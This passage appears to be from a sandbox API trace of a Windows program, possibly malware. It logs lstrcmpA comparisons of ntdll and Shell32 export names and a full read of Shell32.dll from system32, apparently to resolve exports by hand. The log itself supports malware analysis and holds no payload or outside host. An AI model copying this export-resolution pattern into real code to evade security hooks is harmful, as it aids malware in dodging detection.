(lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.256] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.256] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.256] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0203.256] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0203.256] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0203.256] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0203.256] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0203.256] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0203.256] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0203.257] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0203.257] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.257] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.257] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.257] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.257] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0203.257] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0203.257] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0203.257] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0203.257] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0203.257] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0203.257] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0203.257] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0203.257] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0203.257] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.257] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.257] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.257] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.257] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0203.257] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0203.257] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0203.257] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0203.257] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0203.258] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.258] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.259] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0203.259] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0203.259] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0203.259] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0203.259] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0203.259] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0203.259] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0203.259] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0203.259] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0203.259] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0203.260] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0203.260] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0203.260] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0203.260] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0203.260] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0203.261] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0203.261] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0203.261] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0203.261] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0203.261] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.261] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.261] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.261] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.261] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0203.261] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0203.262] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0203.263] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0203.263] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0203.263] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0203.263] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0203.263] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0203.263] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0203.263] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0203.263] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0203.263] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0203.263] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0203.263] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0203.263] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.263] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.263] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.263] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.263] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0203.263] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0203.263] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0203.263] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0203.264] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0203.264] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0203.264] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0203.264] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0203.264] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0203.264] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0203.264] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0211.359] GetProcessHeap () returned 0x570000 [0211.359] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4108040 | out: hHeap=0x570000) returned 1 [0211.698] GetProcessHeap () returned 0x570000 [0211.698] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5892e0 [0211.700] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0211.700] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0211.701] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0211.701] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0211.701] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0211.701] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0211.701] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0211.702] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0211.702] GetProcessHeap () returned 0x570000 [0211.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1587258) returned 0x4109040 [0212.174] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0212.174] ReadFile (in: hFile=0x140, lpBuffer=0x4109040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4109040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0223.835] CloseHandle (hObject=0x140) returned 1 [0223.836] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0223.836] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0223.836] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0223.837] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0223.837] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0223.837] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0223.837] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0223.837] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0223.837] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.837] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0223.837] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0223.837] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0223.837] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.837] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0223.837] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0223.837] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0223.837] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0223.837] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.837] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0223.837] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.837] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0223.838] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0223.838] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0223.838] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.838] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0223.838] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0223.838] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.838] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0223.838] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0223.838] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0223.838] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.838] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0223.838] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.838] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.838] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0223.838] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0223.838] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0223.838] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0223.838] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.838] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0223.838] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.838] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.838] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0223.838] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0223.838] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0223.838] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0223.838] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0223.838] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.838] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.839] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0223.839] lstrcmpA 